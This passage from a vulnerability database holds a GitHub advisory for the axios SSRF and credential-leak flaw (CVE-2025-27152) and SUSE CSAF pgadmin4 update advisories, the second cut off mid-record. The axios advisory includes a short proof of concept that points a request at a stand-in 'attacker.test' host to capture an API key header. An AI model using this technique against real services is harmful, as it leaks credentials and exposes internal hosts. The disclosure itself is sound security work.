"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.30.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-27152"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-07T15:16:00Z",
"nvd_published_at": "2025-03-07T16:15:38Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463\n\nA similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if \u2060`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.\n\n### Details\n\nConsider the following code snippet:\n\n```js\nimport axios from \"axios\";\n\nconst internalAPIClient = axios.create({\n baseURL: \"http://example.test/api/v1/users/\",\n headers: {\n \"X-API-KEY\": \"1234567890\",\n },\n});\n\n// const userId = \"123\";\nconst userId = \"http://attacker.test/\";\n\nawait internalAPIClient.get(userId); // SSRF\n```\n\nIn this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.\n\nIt is recommended that:\n\n-\tWhen `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.\n-\tBefore sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.\n\n### PoC\n\nFollow the steps below to reproduce the issue:\n\n1.\tSet up two simple HTTP servers:\n\n```\nmkdir /tmp/server1 /tmp/server2\necho \"this is server1\" \u003e /tmp/server1/index.html \necho \"this is server2\" \u003e /tmp/server2/index.html\npython -m http.server -d /tmp/server1 10001 \u0026\npython -m http.server -d /tmp/server2 10002 \u0026\n```\n\n\n2.\tCreate a script (e.g., main.js):\n\n```js\nimport axios from \"axios\";\nconst client = axios.create({ baseURL: \"http://localhost:10001/\" });\nconst response = await client.get(\"http://localhost:10002/\");\nconsole.log(response.data);\n```\n\n3.\tRun the script:\n\n```\n$ node main.js\nthis is server2\n```\n\nEven though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.\n\n### Impact\n\n-\tCredential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.\n-\tSSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.\n-\tAffected Users: Software that uses `baseURL` and does not validate path parameters is affected by this issue.",
"id": "GHSA-jr5f-v2jv-69x6",
"modified": "2025-11-27T08:44:27Z",
"published": "2025-03-07T15:16:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27152"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/issues/6463"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/6829"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v1.8.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL"
}
SUSE-SU-2025:1227-1
Vulnerability from csaf_suse - Published: 2025-04-14 07:06 - Updated: 2025-04-14 07:06Summary
Security update for pgadmin4
Notes
Title of the patch
Security update for pgadmin4
Description of the patch
This update for pgadmin4 fixes the following issues:
- CVE-2025-27152: axios: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)
Patchnames
SUSE-2025-1227,SUSE-SLE-Module-Python3-15-SP6-2025-1227,openSUSE-SLE-15.6-2025-1227
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for pgadmin4",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for pgadmin4 fixes the following issues:\n\n- CVE-2025-27152: axios: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-1227,SUSE-SLE-Module-Python3-15-SP6-2025-1227,openSUSE-SLE-15.6-2025-1227",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_1227-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:1227-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-20251227-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:1227-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-April/038971.html"
},
{
"category": "self",
"summary": "SUSE Bug 1239308",
"url": "https://bugzilla.suse.com/1239308"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
}
],
"title": "Security update for pgadmin4",
"tracking": {
"current_release_date": "2025-04-14T07:06:34Z",
"generator": {
"date": "2025-04-14T07:06:34Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:1227-1",
"initial_release_date": "2025-04-14T07:06:34Z",
"revision_history": [
{
"date": "2025-04-14T07:06:34Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-cloud-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-desktop-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-doc-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"product": {
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"product_id": "system-user-pgadmin-8.5-150600.3.9.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp6"
}
}
},
{
"category": "product_name",
"name": "openSUSE Leap 15.6",
"product": {
"name": "openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:leap:15.6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-8.5-150600.3.9.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
},
"product_reference": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-cloud-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-desktop-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
},
"product_reference": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-14T07:06:34Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
}
]
}
SUSE-SU-2025:01326-1
Vulnerability from csaf_suse - Published: 2025-08-14 13:03 - Updated: 2025-08-14 13:03Summary
Security update for pgadmin4
Notes
Title of the patch
Security update for pgadmin4
Description of the patch
This update for pgadmin4 fixes the following issues:
- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)
- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user's session if two users authenticate simultaneously via ldap (bsc#1234840)
- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)
Patchnames
SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for pgadmin4",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for pgadmin4 fixes the following issues:\n\n- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)\n- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user\u0027s session if two users authenticate simultaneously via ldap (bsc#1234840)\n- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_01326-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:01326-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-202501326-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:01326-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-August/041215.html"
},
{
"category": "self",
"summary": "SUSE Bug 1224295",
"url": "https://bugzilla.suse.com/1224295"
},
{
"category": "self",
"summary": "SUSE Bug 1234840",
"url": "https://bugzilla.suse.com/1234840"
},
{
"category": "self",
"summary": "SUSE Bug 1239308",
"url": "https://bugzilla.suse.com/1239308"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-1907 page",
"url": "https://www.suse.com/security/cve/CVE-2023-1907/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-4068 page",
"url": "https://www.suse.com/security/cve/CVE-2024-4068/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
}
],
"title": "Security update for pgadmin4",
"tracking": {
"current_release_date": "2025-08-14T13:03:13Z",
"generator": {
"date": "2025-08-14T13:03:13Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:01326-1",
"initial_release_date": "2025-08-14T13:03:13Z",
"revision_history": [
{
"date": "2025-08-14T13:03:13Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product_id": "pgadmin4-4.30-150300.3.18.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product_id": "pgadmin4-4.30-150300.3.18.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-doc-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product_id": "pgadmin4-4.30-150300.3.18.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product_id": "pgadmin4-4.30-150300.3.18.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product_id": "pgadmin4-4.30-150300.3.18.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-1907",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-1907"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability was found in pgadmin. Users logging into pgAdmin running in server mode using LDAP authentication may be attached to another user\u0027s session if multiple connection attempts occur simultaneously.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-1907",
"url": "https://www.suse.com/security/cve/CVE-2023-1907"
},
{
"category": "external",
"summary": "SUSE Bug 1234840 for CVE-2023-1907",
"url": "https://bugzilla.suse.com/1234840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-14T13:03:13Z",
"details": "important"
}
],
"title": "CVE-2023-1907"
},
{
"cve": "CVE-2024-4068",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-4068"
}
],
"notes": [
{
"category": "general",
"text": "The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends \"imbalanced braces\" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-4068",
"url": "https://www.suse.com/security/cve/CVE-2024-4068"
},
{
"category": "external",
"summary": "SUSE Bug 1224256 for CVE-2024-4068",
"url": "https://bugzilla.suse.com/1224256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-14T13:03:13Z",
"details": "important"
}
],
"title": "CVE-2024-4068"
},
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
